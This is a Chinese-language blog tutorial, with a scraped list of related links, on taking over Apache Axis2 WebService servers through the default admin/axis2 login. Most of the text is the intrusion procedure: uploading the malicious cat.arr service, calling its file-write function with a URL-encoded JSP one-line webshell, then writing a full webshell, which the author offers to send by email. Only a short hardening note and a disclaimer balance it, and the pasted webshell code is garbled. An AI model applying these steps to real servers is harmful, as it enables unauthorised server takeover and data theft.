利用Axis2默认口令安全漏洞可入侵WebService网站
- 利用Axis2默认口令安全漏洞可入侵WebService网站
-
近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。
乌云Axis2默认口令安全弱点利用案例:
航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过)
乐信通某服务器axis2服务存在弱口令可上传webshell(root权限)
中国科学院网Web-services(axis2)系统任意代码执行
工具准备:
Axis2利用工具包: cat.arr
cat.arr工具说明与下载参见大牛“PHP to Java”的博客http://javaweb.org/?p=1548
JSP一句话木马
服务器端一句话木马代码:
<%if(request.getparameter(“f”)!=null)(new>
<%if(request.getparameter(“f”)!=null)(new>
客户端提交代码:
jsp?f=大木马.jsp”" method="”post”"> your code
JSP大马
大马我就不发布出来了,如有需要可发我QQ邮箱2749958485@qq.com索要。
URL编码工具
我用的是小葵转码,也可以利用网上在线的转码工具
渗透流程:
第一步,确认目标WebService网站后台URL地址。
我在本地搭建的后台地址为 http://10.10.10.138:8080/axis2/axis2-admin/ , 按照webservice的部署经验,直接部署在根目录下的网站也比较多,则后台地址多为 http://*.*.*:8080/axis2-web/ 。点击Administration 进入Axis2后台登录界面,输入默认口令admin/axis2,若口令没有被更改则可成功进入后台管理界面。


第二步,点击左侧“Upload Service”上传cat.arr,这个arr包实际上是个中马,我们主要利用这个网马的获取web应用路径、写入文件这两个功能。cat工具上传成功之后,点击左侧“Available Service”可以看到上传的service项“Cat”。
在客户端利用这个网马的getClassPath功能获取当前应用路径
http://10.10.10.137:8080/axis2/services/Cat/getClassPath
利用文件写入功能往获取的web应用路径下写入服务器端JSP一句话木马,注意此处需要将一句话木马代码先转码成URL编码,另外在URL中添加内容的时候注意不准换行,复制黏贴时要特别注意。http://10.10.10.137:8080/axis2/services/Cat/writeStringToFile?data=%253C%25if%28request.getParameter%28%25E2%2580%259Cf%25E2%2580%259D%29!%3Dnull%29%28new%2520java.io.Fil&file=/C:/Program%20Files/Apache%20Software%20Foundation/Tomcat%207.0/webapps/axis2/1.jsp&encoding=utf-8&append=false

第三步,利用JSP一句话木马的客户端提交代码写入JSP大马。在提交表单中填入JSP大马代码,点击提交即可。此处注意自行修改客户端提交代码中的JSP一句话木马文件路径以及要写入的JSP大马文件名。
第四步,访问上传的大马,即可获得web应用服务器控制权限。
安全加固方法:
修改Axis2默认账户名与口令,具体位置在axis2中的conf.xml文档中,修改如下两行代码。
admin
axis2
【后记】:写本篇文章主要是想说明Axis2默认账户口令的危害,希望大家不要滥用文章中涉及到的渗透技术,共同建立一个良好的信息安全环境。
利用Axis2默认口令安全漏洞可入侵WebService网站的更多相关文章
- 利用Axis2默认口令安全漏洞入侵WebService网站
近期,在黑吧安全网上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展.黑吧安全网Axis2默认口令 ...
- IPMI相关漏洞利用及WEB端默认口令登录漏洞
IPMI相关漏洞 0套件漏洞 使用0套件时,只需要Username,口令任意即可绕过身份鉴别执行指令.而且一般还有一个默认的账户admin或者ADMIN. 备注:IPMI是一套主机远程管理系统,可以远 ...
- 漏洞利用 Exploit---利用默认口令、IP假冒、应用漏洞
漏洞利用 编辑 讨论 本词条由“科普中国”科学百科词条编写与应用工作项目 审核 . 漏洞利用(英语:Exploit,本意为“利用”)是计算机安全术语,指的是利用程序中的某些漏洞,来得到计算机的控制权( ...
- struts2漏洞-第一次入侵经历
这两天上数据库,老师给了我们一个网站,该网站是一个售花网站.是有一个师兄写的毕业设计.然后挂在内网,然后使用这个系统,然后分析网站,写个数据库设计的报告.简单的写了数据库作业后就闲来无事做,就想对这个 ...
- 周末惊魂:因struts2 016 017 019漏洞被入侵,修复。
入侵(暴风雨前的宁静) 下午阳光甚好,想趁着安静的周末静下心来写写代码.刚过一个小时,3点左右,客服MM找我,告知客户都在说平台登录不了(我们有专门的客户qq群).看了下数据库连接数,正常.登录阿里云 ...
- 利用phpcms后台漏洞渗透某色情网站
本文来源于i春秋学院,未经允许严禁转载 phpcms v9版本最近爆了好几个漏洞,网上公开了不少信息,但没有真正实战过,就不能掌握其利用方法,本次是在偶然的机会下,发现一个网站推荐楼凤信息,通过分析, ...
- MS14-064 漏洞测试入侵——20145301
MS14-064 漏洞测试入侵 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术 执行摘要 此安全更新可解决 Microsof ...
- 如何扫描统计全国Telnet默认口令
如何扫描统计全国Telnet默认口令 zrools2016-01-21共339474人围观 ,发现 23 个不明物体系统安全终端安全 本文原创作者:zrools 本文中介绍的工具.技术带有一定的攻击性 ...
- MS14-064 漏洞测试入侵win7
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – ...
随机推荐
- JSONP - 跨域AJAX
基础概念 在进入本文正题之前,我们需要先了解一些基础概念(如果你已经对这些基础有所了解,可跳过此段落). 同源策略和跨域概念 同源策略(Same-orgin policy)限制了一个源(orgin)中 ...
- C# - JSON操作
Newtonsoft.dll插件 http://download.csdn.net/detail/xinping_168/4710720 洪大师二次封装: using System; using Sy ...
- Oracle创建自增字段方法-ORACLE SEQUENCE的简单介绍
引用自 :http://www.2cto.com/database/201307/224836.html Oracle创建自增字段方法-ORACLE SEQUENCE的简单介绍 先假设有这么一个表 ...
- 【iCore2双核心板】SRAM 读写实验(基于Verilog语言)
_____________________________________ 深入交流QQ群: A: 204255896(1000人超级群,可加入) B: 165201798(500人超级群,满员) C ...
- ps命令交叉编译
busybox中的ps命令是针对于嵌入式的,其中一些选项并不完整.因此需要将源码下载下来,进行交叉编译 官方下载地址 github下载地址 含有configure,我在此使用的是这个源码包,官方的包在 ...
- Android shell 命令总结
Package Manage(PM) pm list packages [FILTER] 查看已安装的应用包 -f 显示关联的apk文件 -s 只在系统应用中搜索Filter -3 只在第三方应用中搜 ...
- mysql insert一条记录后怎样返回创建记录的主键id,last_insert_id(),selectkey
mysql插入数据后返回自增ID的方法 mysql和oracle插入的时候有一个很大的区别是,oracle支持序列做id,mysql本身有一个列可以做自增长字段,mysql在插入一条数据后,如何能获得 ...
- DirectX 常用选项(转)
内存池表面和其它一些Direct3D资源被放在多种内存池中.内存池的种类由D3DPOOL枚举类型的一个成员来指定.可用到的内存池有下列几种:D3DPOOL_DEFAULT--表示Direct3D将根据 ...
- js获取各种宽高方法
屏幕的有效宽高: window.screen.availHeightwindow.screen.availWidth 网页可见区域宽:document.body.clientWidth 网页可见区域高 ...
- cPanel设置自定义404错误页
利用这个cpanel的错误页工具,你就可以定制错误页面了.设置自定义404错误页,有两种简单的方法. 一,利用cpanel后台控制面板添加设置404自定义错误页的方法 步骤 1.登录cPa ...